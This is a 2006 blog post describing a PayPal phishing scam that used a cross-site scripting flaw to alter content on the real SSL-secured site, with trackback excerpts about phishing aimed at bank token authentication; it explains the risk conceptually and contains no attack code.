Paypal Phishing Scam: XSS Beats SSL
In this article covered by Netcraft, Paypal users are now faced with a new threat. Phishing email send by spammers and worms than redirect users to the valid Paypal site while using a Cross Site Scripting (XSS) vulnerability to insert code into the Paypal site to steal personal information. Here are the details of the exploit.
The scam works quite convincingly, by tricking users into accessing a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate is presented to confirm that the site does indeed belong to PayPal; however, some of the content on the page has been modified by the fraudsters via a cross-site scripting technique (XSS).
I am pretty sure that Paypal would have removed this problem from their site already. My main worry now is that other commerce and financial websites might have the same problems. The point of this exploit is that XSS can be used to deceive a user into trusting a compromised site just because it has a valid TLS/SSL (most people know this as HTTPS or the little-padlock-you-see-in-your-browser-when-visiting-secure websites) certificate.
XSS works by exploiting weaknesses in the website to insert arbitrary code. This arbitrary code can be in the form of HTML or Javascript (yes, executable scripts). With code like this, it is possible to transmit information to other “untrusted” destinations. In this case, a Korean-hosted phish collector server. It is scary because users are confident that this is a secure site because the digital certificate of the website was valid. Because of the XSS vulnerability, phishers can take advantage of user’s sense of security.
This is not new at all. There are many articles about phishing scams that use XSS to insert scripts into SSL protected websites. These exploits are normally fixed by providers immediately. However, as customers, there is always that window of vulnerability. So, it is best to play safe. It might be best to revisit my old blog entry about a few ways to avoid phishing. It is mainly about IVR phishing, but, the general principles apply.
July 15th, 2006 at 9:36 am
[…] Looks like phishers are really being more and more creative these days. Previously, I wrote a number of blog entries about phishing. One particular entry was about a way to use XSS vulnerabilities to beat SSL security which was previously used on Paypal. The scary part is that phisher’s already have started exploiting these XSS vulnerabilies and integrating them into phishing schemes. Here is an article from NetworkWorld describing the increased use of phishing to beat token-based authentication systems. These systems are primarily used for e-banking and other secure online transactions! Scammers have found a way around new token-based authentication systems that have been adopted by some banks. Over the past few weeks, approximately 35 phishing Web sites have been set up that use the new attack. They attempt to trick users into divulging the temporary passwords created by the security token devices used by banks such as Citigroup, said Rich Miller, an analyst with Internet research company Netcraft. Phishers have only recently begun looking for ways around token authentication, using what is known as a “man-in-the-middle” attack, Miller said. “These attacks are worrisome because they took advantage, fairly early on, of a system that’s seen as enhancing security for banking customers,” he said. […]
September 10th, 2006 at 3:52 am
[…] The same thing can be achieve if the bookmarks in one’s computer is correctly encoded and if TLS/SSL is use. However, this may be problematic if that target site is prone to TLS/SSL phishing. For even greater security, two (2) way TLS/SSL (and optionally secure browser triggered) should also be used for more comprehensive security. […]